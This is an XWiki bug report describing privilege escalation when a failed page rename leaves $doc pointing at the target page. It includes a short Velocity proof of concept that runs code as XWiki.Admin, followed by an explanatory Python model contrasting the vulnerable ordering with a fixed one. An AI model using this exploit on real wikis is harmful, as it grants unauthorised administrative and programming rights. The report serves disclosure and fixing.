XWiki Platform / XWIKI-2783

Privilege escalation while renaming a page for Girliz


Details

    • Bug
    • Resolution: Duplicate
    • Major
    • {Unused} Core

    Description

      While renaming a page, even if the rename fails, $doc points to the page the user passed to $doc.rename().
      This allows scripts to be executed with privileges other than the user's own.

      For example, since a user has write access to his user page by default, he can execute code as XWiki.Admin by inserting this in his user page:

      #set($renamedBLs = $util.arrayList)
      $doc.rename("XWiki.Admin", $renamedBLs)
      ## After this line, the code is executed as if it were in the page XWiki.Admin
      ## If XWiki.Admin was saved by XWiki.Admin and XWiki.Admin has programming rights, this should work:
      <%= "Deny Everything" %>
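      The ordering problem the report describes, as an added illustration that is not XWiki code: a constructed Python model in which the current document is re-pointed at the rename target before the rename is authorised, beside a form that only moves the current document after a successful commit. All page and user names (XWiki.Alice, the ownership rule) are hypothetical.

```python
# Constructed model of the defect in this issue (not XWiki code, names hypothetical): a failed
# rename leaves $doc on the target page, so later script code runs with that page author's rights.
from dataclasses import dataclass

@dataclass
class Page:
    name: str
    author: str                 # last saver; scripts in the page run with this author's rights
    programming: bool = False   # whether that author holds programming rights

@dataclass
class Context:
    user: str     # the user whose page is being rendered
    pages: dict   # name -> Page, the wiki's store
    doc: Page     # the script's current document ($doc)

    def _rename_allowed(self, page, new_name):
        # Constructed rule: caller must own the page and the target name must be free.
        return page.author == self.user and new_name not in self.pages

    def _commit(self, old, new_name):
        page = Page(new_name, old.author, old.programming)
        del self.pages[old.name]
        self.pages[new_name] = page
        return page

    def rename_vulnerable(self, new_name):
        # Modelled defect: $doc is re-pointed at the target before authorisation and not restored on failure.
        old = self.doc
        self.doc = self.pages.get(new_name) or Page(new_name, old.author, old.programming)
        if not self._rename_allowed(old, new_name):
            return False            # failed, yet self.doc is now the target page
        self.doc = self._commit(old, new_name)
        return True

    def rename_fixed(self, new_name):
        # Hardened form: authorise first, move $doc only after a successful commit.
        old = self.doc
        if not self._rename_allowed(old, new_name):
            return False            # context untouched on failure
        self.doc = self._commit(old, new_name)
        return True

def demo(vulnerable, target="XWiki.Admin"):
    # XWiki.Admin was saved by an admin with programming rights; Alice owns only her page.
    pages = {"XWiki.Admin": Page("XWiki.Admin", "XWiki.Admin", True),
             "XWiki.Alice": Page("XWiki.Alice", "XWiki.Alice")}
    ctx = Context("XWiki.Alice", pages, pages["XWiki.Alice"])
    ok = (ctx.rename_vulnerable if vulnerable else ctx.rename_fixed)(target)
    return ok, ctx.doc.name, ctx.doc.programming   # scripts run with $doc's author rights
```

      In the vulnerable form the rename to an existing page fails but the context now reports programming rights; in the hardened form a failed rename leaves the caller's own page, and only a permitted rename changes it.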
      

      People

        tmortagne Thomas Mortagne
        raffaello Raffaello Pelagalli